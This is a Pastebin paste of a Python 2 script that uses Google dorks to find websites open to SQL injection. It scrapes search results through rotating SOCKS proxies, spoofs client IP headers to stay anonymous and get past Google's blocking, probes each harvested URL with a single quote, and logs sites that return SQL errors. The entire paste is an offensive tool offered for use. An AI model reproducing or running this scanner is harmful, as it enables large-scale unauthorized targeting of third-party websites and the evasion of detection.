Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #SQLi google dork scanner
- #coded by Freak/SynthMesc
- #Version 1.0.3
- import sys,re,random,string,time,threading,os,socks
- import socket
- import urllib2,urllib
- try:
- dorklist=sys.argv[1]
- proxylist=sys.argv[2]
- except:
- print "Usage: " + sys.argv[0] + " [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
- exit(1)
- def switchProxy():
- try:
- socket.backup
- except:
- socket.backup = socket.socket
- socket.socket = socket.backup
- proxyhost = random.choice(open(proxylist,"r").read().split("\n")).split(":")
- proxyport = int(proxyhost[1])
- proxyhost = proxyhost[0]
- socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxyhost, proxyport)
- socket.socket = socks.socksocket
- def randomIP():
- return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
- def test(url):
- try:
- opener = urllib2.build_opener()
- opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
- opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
- opener.addheaders = [('REMOTE-ADDR',randomIP())]
- opener.addheaders = [('VIA',randomIP())]
- opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
- keywords=["SQL", "Syntax", "Warning"]
- testchar="'"
- print "[+] Trying "+url+testchar
- try:
- resp=opener.open(url+testchar,timeout=5)
- except Exception, e:
- print "[-] "+str(e)
- return
- words = resp.read().split(" ")
- for keyword in keywords:
- try:
- for x in words:
- if keyword in x:
- print "[+] Found keyword '"+keyword+"' at "+url+testchar
- f=open("SQLi_Vulnerable.txt","a")
- f.write(url+testchar+"\n")
- f.close()
- break
- except urllib2.HTTPError as e:
- print "[-] "+str(e)
- pass
- except urllib2.URLError as e:
- print "[-] "+str(e)
- pass
- def spyder(dork,page):
- opener = urllib2.build_opener()
- opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
- opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
- opener.addheaders = [('REMOTE-ADDR',randomIP())]
- opener.addheaders = [('VIA',randomIP())]
- opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
- opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
- opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
- opener.addheaders = [('Accept-Encoding','gzip, deflate')]
- opener.addheaders = [('Referer',dork)]
- try:
- searchresults=opener.open(dork,timeout=5).read()
- except Exception, e:
- print "[-] "+str(e)
- print "[-] Bot has been blocked from google!!! Switching proxy!"
- switchProxy()
- spyder(dork, page)
- try:
- searchresults
- except NameError:
- # print "[-] Variable undefined, re-searching"
- try:
- searchresults=opener.open(dork,timeout=5).read()
- except:
- try:
- searchresults=opener.open(dork,timeout=5).read()
- except:
- print "[-] Bot has been blocked from google!!! Switching proxy!"
- switchProxy()
- spyder(dork, page)
- else:
- pass
- # print "[+] Variable defined, continuing search"
- for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
- i=i.replace("amp;",'')
- if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
- dorkurl="https://encrypted.google.com"+i
- print "[+] Searching next page "+dorkurl
- time.sleep(5)
- spyder(dorkurl,page)
- page+=1
- i=urllib2.unquote(i).decode('utf8')
- try:
- i=i.split("?q=")[1]
- i=i.split("&sa=")[0]
- if i.startswith("http"):
- if i.startswith("http://accounts.google.com"):
- continue
- elif i.startswith("http://www.google.com"):
- continue
- elif i.startswith("http://encrypted.google.com"):
- continue
- elif i.startswith("http://webcache.googleusercontent.com"):
- continue
- elif i!=dork.decode('utf8'):
- threading.Thread(target=test, args=(i,)).start()
- except:
- continue
- f=open(dorklist,"r")
- for dork in f.read().split("\n"):
- print "[+] Searching for dork: '"+dork+"'"
- spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
- f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement